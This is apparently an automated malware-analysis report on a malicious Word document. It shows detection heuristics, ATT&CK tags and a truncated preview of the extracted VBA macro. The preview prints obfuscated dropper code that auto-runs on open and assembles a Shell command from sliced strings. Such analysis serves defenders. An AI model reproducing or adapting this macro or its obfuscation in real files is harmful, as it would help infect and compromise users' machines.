MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'OLE_VBA_SHELL' heuristic firing indicates the macro uses the Shell() function, a common technique for executing arbitrary code. The presence of 'macros.bas' and the 'OLE_LEGACY_WORDBASIC_AUTOEXEC' and 'OLE_VBA_AUTOOPEN' firings further confirm the macro's presence and auto-execution capability. The obfuscated nature of the VBA script prevents a detailed analysis of its specific actions, but the overall pattern suggests it acts as a downloader for a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6458499-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6458499-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61529 bytes |
SHA-256: ed69d85284cca2b635aab52bcd70518c571fa5ac2e942bd3ea657fe8bb7c8741 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 31 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jnhkbzsM"
Sub hjznlihJ()
On Error Resume Next
Do While sPRvImFzzdYA Xor aYEJHdVNi
Dim qohrmSV
Do While ULtYJqnfvfdC Or nQLGZic
DnbODbGau = 6025 - Atn(fcrDpdBO / CByte(7) + Vciqkbw + Hex(XWkNk)) + (171376742 / ORYRKGOjEAMwZ) * (5938624 * ChrW(520437311) + jbhFLTGuU * rmHZjEJFvjdmQL)
Loop
HAoXiilCYSwof = 6025 - Atn(QmTwb / CByte(7) + YwozzqHCpu + Hex(LWPDSRWmSFjjGn)) + (171376742 / iDfzJqok) * (5938624 * ChrW(520437311) + JMrYrWjM * VkRPwzUzJJ)
Do
pPhKiLDXs = GWlwtGawvvWX * CDate(426718607 * Atn(lCwOEh - Fix(LhfObuijpf * CDate(8832))) * LTrPOjRE / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(twOOzRJwIkwzq) / ZZrXWzcu - ChrB(872) / PcKDNW + Chr(778 / Atn(48 * Round(SzzqjMSROKki / CBool(2)))) / (1199 / CByte(FiTVERpXI * 8 + FOzqwlpOvZURzz * CDbl(39)))
Loop Until jMGaI <= PuVDjJp
wjQJCubjWTfZvo = DnjTUX + izAip
Loop
Set dmSczOzt = IzFYw
End Sub
Function qNRLqhKkwNnNE()
On Error Resume Next
fNhCT = "jMQfPOdiGDvRKTXDtDssPs"
NvXwnjSDOzu = fmiMjiIbBWcFVO = 6025 - Atn(wQYINWG / CByte(7) + RTUZwsjC + Hex(mFwGiX)) + (171376742 / nRNZrCpQrQA) * (5938624 * ChrW(520437311) + BHHbYRRsMJJjU * VSQSGSsr)
opBESpFuz = vJhcPiDhi = 6025 - Atn(qAwidXpNiUdHd / CByte(7) + XjWAY + Hex(hwJmMSr)) + (171376742 / BOIbbriTXnmu) * (5938624 * ChrW(520437311) + FNXrnjcF * HCIXKrqMSLj)
vjJsIMErIPH = iuivbdfghnkjgyugjn(fNhCT, 12, 1)
SUiMpUDjz = "TjstEAFurVrfmdNnjNzpFuDP% tV"
dOrQBiwFzA = rNhtiRna = 6025 - Atn(fZtbBwABmFFfoO / CByte(7) + bJAPBzTcLb + Hex(EjzcovBFIBE)) + (171376742 / mSbhBWAmDwFS) * (5938624 * ChrW(520437311) + QYYALwizT * RCKQKdjFaWWOz)
KXcdNRz = RSGKoiFij = 6025 - Atn(XXcFz / CByte(7) + WmTaK + Hex(qFqJTtiwBCa)) + (171376742 / isqXLommVGtmAd) * (5938624 * ChrW(520437311) + WzjvXO * bAUfKMzkCUwd)
auWELBuTf = iuivbdfghnkjgyugjn(SUiMpUDjz, 2, 16)
fpIWMW = "DKAWHhcF&&p=%1ZO"
wqpBcfzhdpV = jhAvJqTuTZAm = 6025 - Atn(JAzwSL / CByte(7) + ffQjFLQXGDKBCn + Hex(tptbWYwHNXJp)) + (171376742 / MndOcRFERQpwa) * (5938624 * ChrW(520437311) + oQPzjUZGHDrpXh * CMwVZLTav)
IjiwPXN = lhfcZDcwc = 6025 - Atn(rzXZUR / CByte(7) + fZWntY + Hex(OEtcAkUqTbz)) + (171376742 / tiizOsvXjEoW) * (5938624 * ChrW(520437311) + IFnAZ * sJzNUKAvrpBi)
VCuQZ = iuivbdfghnkjgyugjn(fpIWMW, 3, 6)
kIoOtl = "aEVrav%!kOmjuQjDojDi"
LSaUuhFv = tqaUqmYOGTEp = 6025 - Atn(uzpiUiLRw / CByte(7) + PuGHKji + Hex(ciFDErAskDtAhn)) + (171376742 / FEMfRsZqXw) * (5938624 * ChrW(520437311) + LZkiOiYUcG * quzibwIX)
jvCjXrCkrzA = dbUADzERFCsiHZ = 6025 - Atn(aHGpPcNLUnO / CByte(7) + hnRbizAB + Hex(FkaQZGPZOji)) + (171376742 / RDTrSITQQ) * (5938624 * ChrW(520437311) + MpfXd * bKiGXvVXfYqV)
MAbbSzzHnT = iuivbdfghnkjgyugjn(kIoOtl, 13, 5)
zTDYzFJH = "wSXibtfTaAUIGMbDdmmravEfrJj"
aCkkRIMj = kHJKCKtSvRG = 6025 - Atn(EvssFGkNso / CByte(7) + YRoVnFkT + Hex(uKmfstAoAjGF)) + (171376742 / wfXwSKUR) * (5938624 * ChrW(520437311) + pvnlsNpGMKw * juINAMGw)
YuTmvDzDCPD = JiOIVJz = 6025 - Atn(mazUOUrsGAmwu / CByte(7) + vHvMlPjRz + Hex(USjNZcX)) + (171376742 / rPakz) * (5938624 * ChrW(520437311) + VZRUt * TzTnmHN)
ctUjnEHiKGn = iuivbdfghnkjgyugjn(zTDYzFJH, 6, 3)
WSnisCaOtM = "DfkQF% teapGtKvlXDZciMcXWjHfjMFitbD"
qjDKlp = ASwwW = 6025 - Atn(NIQZZiplA / CByte(7) + WksQA + Hex(GZwkahoof)) + (171376742 / jvBjSOiaKjoTTm) * (5938624 * ChrW(520437311) + YLHfaovAdLWA * wjTbtdvukRjI)
iYcLjpq = RFRimG = 6025 - Atn(wCVjIFH / CByte(7) + uYXvNsiiPMap + Hex(rouYXUWqjuYQo)) + (171376742 / tKmSoWIzLtnu) * (5938624 * ChrW(520437311) + mbBWMQU * ObIlkk)
EjTHEQ = iuivbdfghnkjgyugjn(WSnisCaOtM, 27, 4)
tjZHadHvC = "zjNCjVOpiSKLK=%pOAzlCjUmD"
YVuQpCNOiS = ChQsJHYakiMb = 6025 - Atn(cPlzXa / CByte(7) + tPONrUuA + Hex(TZTKAdYHMbr)) + (171376742 / HwtpSwAsLkki) * (5938624 * ChrW(520437311) + smTCAoMXtR * sRIwr)
ODQXzhj = kvjimSVXYX
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.